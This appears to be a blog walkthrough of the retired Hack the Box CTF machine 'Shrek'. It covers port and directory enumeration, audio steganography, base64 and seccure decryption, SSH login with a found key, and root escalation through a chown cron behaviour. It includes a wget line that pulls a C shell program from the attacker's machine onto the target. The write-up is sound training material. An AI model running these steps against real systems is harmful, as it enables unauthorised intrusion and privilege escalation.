Hack the Box Challenge: Shrek Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Shrek” which is available online for those who want to increase their skill in penetration testing and black box testing. Shrek is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.47 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.47                   

From given below image, you can observe we found port 21,22 and 80 are open in victim’s network.

As we know from the nmap scan that the target machine is running http on port 80, we use dirb to enumerate the directories.

dirb http://10.10.10.47

We first open the ip in our browser.

We open uploads/ directory that we found in the dirb scan and find a file called secret_ultimate.php.

Now we use wget to download the file into our system.

wget http://10.10.10.47/uploads/secret_ultimate.php

We open secret_ultimate.php and find a path to a directory called secret_area_51.

We open it in our browser and find an audio file in that directory.

We download into our system and use an online site called academo.org to analyse the spectrum, we find a hint to login through ftp using username donkey.

Further analysis of the audio file gives us the password to the username.

We login through ftp and find a few text files and a file simply called key.

We download the key and all the test files we use mget to mass download the txt files.

ftp> get key

ftp> mget *.txt

On our system as we can see all the files have been downloaded.

In the highlighted file above we found a base64 encoded string that were differentiated by space.

We decode the first base64 encoded string and find the decoded string to be ‘PrinceCharming’

In another file we find a base64 encoded string similarly differenctiated by space.

We decode the base64 encoded string and find a hexdecimal encoded string.

We use python to decode the hexadecimal string. We use seccure module and use ‘PrinceCharming’ as key to decode the string.

import seccure

string =”hexadecimal string”

print seccure.decrypt(string, “PrinceCharming”)

We open the key file and find that is a rsa key for ssh.

We use this key to login through using this rsa key. We use username as sec as we found earlier and use the passphrase we found before to login. As we login we go to /home/sec directory, in that directory we find a file called user.txt. When we open the file we get our first flag.

Going through the directories we find a file called thoughts.txt

We create a file called raj in this directory.

After a few minutes we find that it changed to root user and group.

Now to exploit the file we create a c program in our system that can give us the root.txt file in root directory. After creating the file we use SimpleHTTPServer module of python to transfer the file.

We now download the file into the target system using wget.

wget http://10.10.14.6:8000/shell.c

After downloading the file we compile the c program as rootshell.

gcc shell.c -o rootshell

We now wait for the system to change the user and group of the file. As soon as it changes the user and group of the file we run it and find the final flag.